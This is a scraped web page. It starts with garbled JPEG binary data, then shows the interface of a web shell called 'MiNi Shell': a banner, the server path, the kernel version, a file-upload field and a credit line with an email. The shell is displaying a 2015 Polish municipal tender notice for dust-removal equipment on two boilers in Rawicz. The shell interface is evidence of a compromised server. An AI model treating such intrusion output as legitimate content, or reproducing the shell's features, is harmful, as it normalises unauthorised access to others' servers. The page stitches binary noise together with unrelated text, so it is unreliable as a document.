JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20150312/54988-N-2015.html

<p class="kh_header"><b>Rawicz: Modernizacja instalacji odpylania  dla dwóch kotłów  typu  KRm 2,5 w kotłowni zlokalizowanej przy ul. Fiołkowej w Rawiczu.</b><br>
<b>Numer ogłoszenia: 54988 - 2015; data zamieszczenia: 12.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Winiary 4B, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5452866, faks 065 5462717.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.rawicz.zapis.net.pl/cache/10//1195/3234/3235/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja instalacji odpylania  dla dwóch kotłów  typu  KRm 2,5 w kotłowni zlokalizowanej przy ul. Fiołkowej w Rawiczu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Wykonanie kompletnej dokumentacji technicznej instalacji odpylania: budowlanej, montażowej, powykonawczej, eksploatacyjnej, łącznie z oprzyrządowaniem i urządzeniami towarzyszącymi (instalacją elektryczną i automatyką) zgodnie z programem funkcjonalno użytkowym zał. nr 2 do SIWZ. Dokumentacja wymaga uzgodnienia z Zamawiającym w fazie przedprojektowej.
Dodatkowe wymogi dla dokumentacji:
- 	Wszystkie części projektu muszą być opracowane w języku polskim,
- 	Projekt musi zawierać wymagane przepisami dokumenty potrzebne do pozwolenia na 	budowę lub zgłoszenia robót budowlanych, o ile wystąpi taka konieczność,
-	Projekt techniczny musi być uzgodniony z Zamawiającym pod względem zastosowanych rozwiązań projektowych i materiałowych,
-	Wykonawca na własny koszt opracuje dokumentację z zakresu ochrony środowiska 	określającą warunki i wielkości emitowanych zanieczyszczeń jeżeli będzie to konieczne,
-	Zamawiający wymaga wydania projektu technicznego i dokumentacji powykonawczej po 3 egz. w formie papierowej i elektronicznej.
Podstawowe wymagania dla nowej stacji odpylania:
-	Dwa kotły typu KRM 2,5 nr K3 i K4 umieszczone są w budynku kotłowni przy ul. 
	Fiołkowej 	2 w Rawiczu,
-	Nowa instalacja umieszczona zostanie w miejscu obecnej, na zewnątrz budynku kotłowni, 	odpylacze typu MOS należy zainstalować w budynku kotłowni.
-	Zamawiający przewiduje możliwość  wykorzystania istniejących wentylatorów WPPo-31,5,
	części kanałów spalin po stronie brudnej i czystej oraz odpylaczy typu MOS.
-	Zaprojektowana instalacja odpylania musi zapewnić stężenie pyłów w spalinach poniżej 
    100 mg Nm3 w przeliczeniu na zawartość tlenu O2 = 6%, zgodnie z  rozporządzeniem 	Ministra Środowiska z dnia 4 listopada 2014 r. w sprawie standardów emisyjnych dla 	niektórych rodzajów instalacji, źródeł spalania paliw oraz urządzeń spalania lub 	współspalania odpadów
-	 Stacja odpylająca musi być wyposażona w automatycznie sterowany system wytrącania 	pyłów.

2. Demontaż istniejącej instalacji odpylającej kotła K3 i K4

Wykonawca opracuje:
-	Technologię rozbiórki wraz z dokumentacją demontażu.
-	Dokumentację niezbędną w przypadku konieczności uzyskania pozwolenia na rozbiórkę w 	tym plan BIOZ,
-	Wszystkie odpady uzyskane w trakcie rozbiórki zagospodaruje Wykonawca,
-	Złom stalowy i zdatne do użytku części zamienne uzyskane w trakcie rozbiórki, Wykonawca przekaże Zamawiającemu,

3. Wykonanie nowej instalacji odpylającej

- Zamawiający dopuszcza projekt i wykonanie stacji odpylającej w technologii opartej na 	odpylaczach inercyjnych jedno lub wielostopniowych z dobudowaną sekcją filtrów 	workowych,
- Na kanałach dymowych przed i za stacją odpylającą należy wykonać punkty pomiarowe, 	niezbędne do wykonania pomiarów poziomu zanieczyszczeń i skuteczności odpylania. 	Punkty pomiarowe muszą spełniać wymogi stawiane przez WIOŚ,
-	Należy zaprojektować i wykonać układ zsypu pyłów z odpylaczy, wykonanie szczelnego 	zamknięcia zasobników pyłów pod stacją odpylania w sposób umożliwiający ich odbiór. 	Zamawiający wymaga, aby zasobniki pyłów pod nowym odpylaczem zostały zaprojektowane 	w sposób umożliwiający ręczne usuwanie z nich pyłów do pojemnika.
-	Należy zaprojektować i wykonać system schodów, drabin i podestów zapewniający 	swobodny dostęp do punktów pomiarowych, klap rewizyjnych, wzierników, elementów 	AKPiA,
-	Izolacje termiczne kanałów spalin należy wykonać z wełny mineralnej w płaszczu z blachy 	stalowej ocynkowanej lub aluminiowej o grubości min. 1 mm z przetłoczeniami 	kopertowymi. Górne płaszczyzny kanałów spalin wyprofilować w sposób uniemożliwiający 	gromadzenie się wód opadowych. W przypadku zadaszenia stacji należy przewidzieć sposób 	odprowadzenia wód opadowych. Izolacja termiczna stacji odpylającej i kanałów spalin musi 	zapewnić temperaturę na powierzchni płaszcza nie wyższą niż 40 0C.
-	Przewidziana projektem koncepcja stacji odpylania powinna umożliwiać zautomatyzowane 	kierowanie procesem maksymalnej skuteczności odpylania w każdym zakresie mocy kotła 	K3 i K4 i zapewnić sterowanie urządzeniami, wizualizację stanów urządzeń, sygnalizowanie 	stanów alarmowych, monitorowanie procesu odpylania i raportowanie.
- 	Ruch wszystkich urządzeń składowych stacji winien być możliwy do realizacji z szaf 	sterowniczych,
- Dla każdego kotła KRm nr K3 i nr K4 należy przewidzieć instalację sterownika stacji 	odpylającej, elementów ręcznego sterowania napędami, elementów sygnalizacji i 	zabezpieczeń przed przekroczeniem dopuszczalnych parametrów pracy dla 	stacji 	odpylania umożliwiająca komunikację z systemem nadrzędnym układu automatyki kotłowni

4. Warunki prowadzenia robót

- Przed przystąpieniem do wykonywania robót należy sporządzić Projekt organizacji 	placu 	budowy oraz Plan Bezpieczeństwa i Ochrony Zdrowia zgodnie obowiązującymi 	przepisami,
- 	Kompletacja i dostawa urządzeń powinna być realizowana w oparciu o dokumentację 	techniczną oraz wg opracowanego harmonogramu,
- Zamawiający zastrzega sobie prawo udziału w odbiorze od dostawcy urządzeń, prób i montażu 	próbnego w szczególności następujących elementów:  zasuw, klap regulacyjnych i 	odcinających, głównych elementów odpylaczy. Kompletacja dostaw oraz rozpoczęcie robót 	montażowych może nastąpić po wcześniejszym przedłożeniu dokumentacji technicznej 	spełniającej obowiązujące przepisy prawa i jej pozytywnym zaopiniowaniu przez 	Zamawiającego. Materiały i urządzenia zastosowane do niniejszej inwestycji winny być 	nowe, wyprodukowane nie wcześniej niż w 2014 roku i posiadać wymagane certyfikaty. 	Wszystkie materiały i urządzenia powinny posiadać dokumenty pozwalające stwierdzić ich 	rok produkcji,
- Wykonawca zobowiązuje się do przestrzegania obowiązujących na terenie Zamawiającego 	przepisów BHP oraz stosowania zasad postępowania w razie wypadku i w sytuacjach 	zagrożeń. Wykonawca zobowiązuje się do przekazania wyżej wymienionych wymagań 	wszystkim osobom biorącym udział z jego strony w realizacji zadania,
- Dostawa i  montaż wszystkich elementów, urządzeń, i materiałów do budowy nowej 	stacji 	odpylania, łącznie z kosztami transportu i ubezpieczenia elementów - leży po stronie 	Wykonawcy.

5. Roboty końcowe, pomiary, odbiory.

- Rozruch instalacji odpylania wraz z 48 godzinną próbą ruchową wykona mieszana Komisja  
    Rozruchowa powołana przez Wykonawcę i Zamawiającego. Zamawiający zapewni obsługę 	kotłów,
- Warunkiem odbioru ostatecznego robót jest wykonanie pomiarów emisji pyłów, SO2, Nox,	 
     przy trzech stanach obciążeń: 30%, 70%, 100% mocy nominalnej, oddzielnie dla każdego 	kotła,
- Pomiary emisji pyłów muszą być wykonane na zlecenie i koszt Wykonawcy przez ekipę  
     pomiarową, posiadającą akredytację PCA stwierdzającą, że procedury badawcze realizowane 	są w oparciu o normę EN-PN-ISO-17025,
- 	 Za pomiary emisji gazów zapłaci Wykonawca,
- Wykonawca wykona i dostarczy instrukcję eksploatacji, przeprowadzi szkolenie obsługi 	stacji i służb odpowiedzialnych za eksploatację w niezbędnym zakresie,
- Odbiór końcowy może być spisany po skompletowaniu wszystkich odbiorów cząstkowych.

6. Na Wykonawcy ciąży obowiązek wykonania następujących prac:
- Załatwienie wszelkich prac związanych z opracowaniem projektów budowlanych w zakresie potrzebnym do realizacji inwestycji,
-  Sporządzenie specyfikacji technicznej wykonania i odbioru robót budowlanych w zakresie 	niezbędnym do realizacji niniejszego zamówienia,
- O wszelkie uzgodnienia, opinie, pozwolenia, decyzje i warunki występuje Wykonawca,
- Zakres i i forma opracowania dokumentacji projektowej, określa Rozporządzenie Ministra  	Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie 	szczegółowego zakresu i formy projektu budowlanego,
- ubezpieczenia budowy i robót z tytułu szkód, które mogą zaistnieć w związku z określonymi zdarzeniami losowymi oraz od odpowiedzialności cywilnej, ponoszenia kosztów szkód wynikłych w czasie wykonywania robót jak również za odpowiedzialność za wszelkie zdarzenia powstałe z tej przyczyny.

UWAGA:
Dokładny zakres prac projektowych i wykonawstwa oraz dodatkowe wymagania inwestora określono w programie funkcjonalno-użytkowym stanowiącym załącznik do niniejszej SIWZ. Program ten stanowi podstawę do przygotowania oferty na opracowanie projektów i realizację robót oraz zawiera dane potrzebne do ustalenia kosztów prac projektowych i robót budowlanych. 
Wykonawca ustala ilość robót i innych świadczeń niezbędnych przy realizacji zamówienia, a następnie sporządza wycenę zadania - kosztorys ofertowy który stanowi załącznik do oferty, którym określa wysokość ceny ofertowej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.13.00-1, 45.25.12.00-3, 71.32.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 7.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca ubiegający się o udzielenie niniejszego zamówienia musi posiadać uprawnienia do wykonywania określonej działalności lub czynności, jeżeli prawa nakładają taki obowiązek ich posiadania. 
Wykonawca potwierdza spełnienie tego warunku poprzez złożenie Oświadczenia Wykonawcy zgodnie z załącznikiem nr   3 do SIWZ.
Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia /nie spełnienia na podstawie złożonych dokumentów i oświadczeń (załącznik nr 3), potwierdzających spełnienie tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 3 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia powyższego warunku dokonana będzie na zasadzie spełnia/ nie spełnia na podstawie załączonego do oferty Oświadczenia Wykonawcy (załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Wypełniona i podpisana przez Wykonawcę oferta przetargowa w oryginale (załącznik 	nr 2 do SIWZ).

	b) Oryginał pełnomocnictwa do reprezentowania lub kopia pełnomocnictwa poświadczona 	przez notariusza.
(pełnomocnictwo należy złożyć w przypadku gdy wykonawcę w przetargu reprezentuje pełnomocnik jak również w przypadku wykonawców wspólnie ubiegających się o zamówienie, którzy zobowiązani są załączyć oryginał pełnomocnictwa do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	potrzeby wykonania robót zamiennych lub odstąpienia od realizacji części robót i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego,
2)	wystąpienia robót dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,      
3)	na uzasadniony wniosek Wykonawcy zaakceptowany przez Zamawiającego i pod warunkiem, że zmiana ta wynika z okoliczności których Wykonawca nie mógł  przewidzieć  na etapie składania oferty i nie jest przez niego zawiniona, 
4)	braku rozwiązań  projektowych  stwierdzonych  w czasie trwania robót o czas niezbędny do ich uzupełnienia,
5)	technologii wykonania robót, a co za tym idzie wynagrodzenie Wykonawcy i termin wykonania, na wniosek Wykonawcy lub Zamawiającego i pod warunkiem, że zmiana ta będzie korzystna dla Zamawiającego, 
6)	wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od wykonawcy,  
7)	wprowadzenie lub zmiana zgłoszonych w ofercie części robót wykonywanych przy udziale Podwykonawcy, za uprzednią zgodą Zamawiającego, 
8)	zmiana terminu realizacji zamówienia, związane z okolicznościami okreslonymi w pkt 1-6
9)	przekształcenie którejkolwiek ze stron umowy,
10)	zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za  realizację zamówienia itp.)
11)	warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna dla Zamawiającego,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.rawicz.zapis.net.pl/cache/10//1195/3234/3235/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zaklad Usług Komunalnych 
ul. Winiary 4b
63-900 Rawicz.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.03.2015 godzina 10:00, miejsce: Zaklad Usług Komunalnych 
ul. Winiary 4b
63-900 Rawicz.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com